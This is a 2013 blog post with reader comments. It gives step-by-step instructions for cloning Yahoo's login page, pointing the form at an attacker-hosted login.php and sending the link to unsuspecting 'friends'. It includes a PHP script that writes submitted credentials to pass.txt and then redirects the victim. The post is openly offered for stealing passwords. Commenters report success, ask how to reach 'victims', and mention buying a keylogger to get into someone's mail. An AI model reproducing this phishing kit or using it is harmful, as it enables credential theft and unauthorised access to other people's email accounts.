Wednesday, April 24, 2013

Hack yahoo using fake login page


In this post I'll show you to hack yahoo using fake login page to hack yahoo in simple steps. A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo, Gmail etc.However, these Fake login pages are created just for the purpose of stealing other's passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.





Hack yahoo using fake login page - Procedure




STEP 1.

Go to the Yahoo login page by typing the following URL.

mail.yahoo.com



STEP 2.


Once the Yahoo login page is loaded, Save the page as Complete HTML File (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.


STEP 3.

Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .


STEP 4.

Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML


STEP 5.

Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src="Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif"

Rename the above link into

src="files/ma_mail_1.gif"

Repeat the same procedure for every file contained in the folder by name "files".

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for ".gif". Repeat the Step 5 for every .gif file.


STEP 6. 

Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.


STEP 7.

Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP


Tip: 110mb.com, Blackapplehost.com etc supports PHP


STEP 8.

Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search aphp script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.


STEP 9.

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.

here is the login script which i am posting due to large number of request..



header("Location: http://WEBSITE ");$handle =
fopen("pass.txt", "a");foreach($_GET as
$variable => $value) {fwrite($handle,
$variable);fwrite($handle, "=");
fwrite($handle, $value);fwrite($handle,
"\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;



14 comments:

  1. Not able to follow step 3, i have saved the page as HTMP but i don't see any folder something like Yahoo! Mail The best web-based email! Pls tell me what to do

    ReplyDelete
  2. Thanx For the Login script

    ReplyDelete
  3. punaly... in the login script you provided, do we have to replace the "http://WEBSITE" with our own website or just leave it??? thanks!

    ReplyDelete
  4. punaly.....in the login script you provided, do we have to replace the "http://WEBSITE" with our own website or just leave it??? thanks!

    ReplyDelete
  5. atleast temme shud i change the data inside .php file coz i thnk variable is nt gettin stored???

    ReplyDelete
  6. hey bud u \m/!!!!!!!!! thnks a lot lot...it did work ! thnks for d script!!!!:-)

    ReplyDelete
  7. @jawaid... NOw ytou haveto put your website ,,eg something.110mb.com

    ReplyDelete
  8. All very well explained but www.110mb.com is pais site. Anyhow, I paid 10$ but they banned my site due to illegal content of Yahoo. Then I used another website 000webhosting.com but my webpage was banned again. Do you know any website that may help? and by the way, I have already spent 100$ on Sniperspy logger, it is worthless for remote installing as it cant be attached to any email as it is identified as virus. I paid 100$ to get a yahoo password from where I got the draft of letter but I need password of mail from where email was sent. Please help me if you know of any website that may be helpful. Thank you

    ReplyDelete
  9. Hi,
    Plz let me know how can we send the Yahoo.HTML link to our victims,coz in Yahoo when i create new message with this link or if i try to attach any file with this link, neither it attached nor the new message go.
    Where and how we will make txt file for storing passwords,etc.
    Please be more specific.
    With thanks,
    Fida

    ReplyDelete
  10. Amazing bro, i made it and its working good !! Thanks for rehacking our boom boom page

    ReplyDelete
  11. yar am suck in step 5

    ReplyDelete
  12. @zeeshan, try again its easy!!

    ReplyDelete
  13. yuppie, i made it and its working. Thanks for your article Asfi

    ReplyDelete